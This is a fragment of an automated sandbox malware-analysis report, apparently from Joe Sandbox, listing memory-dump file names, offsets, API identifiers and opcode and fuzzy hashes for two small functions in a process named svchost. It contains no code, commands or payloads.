                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction ID: 9e016d719b4b5ff0071ca7194b1468e52874619d43008a696f2a0656b197155c
                                                                                                                                  • Opcode Fuzzy Hash: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction Fuzzy Hash: F1E0C9B6611A40D6E7049B62E81839977E1EB8CB56F558028C9490B360DF7DC8AA8B50
                                                                                                                                  Function 00000158709D1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction ID: 0501a84959308c85bc78fa9a5fbec1c55ae6ecd01d602a2daa55f583ab097144
                                                                                                                                  • Opcode Fuzzy Hash: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction Fuzzy Hash: 01E012B6611940D7E7089F62DC0839977E1FBCCF16F548024C9090B320DE3CC8AACB10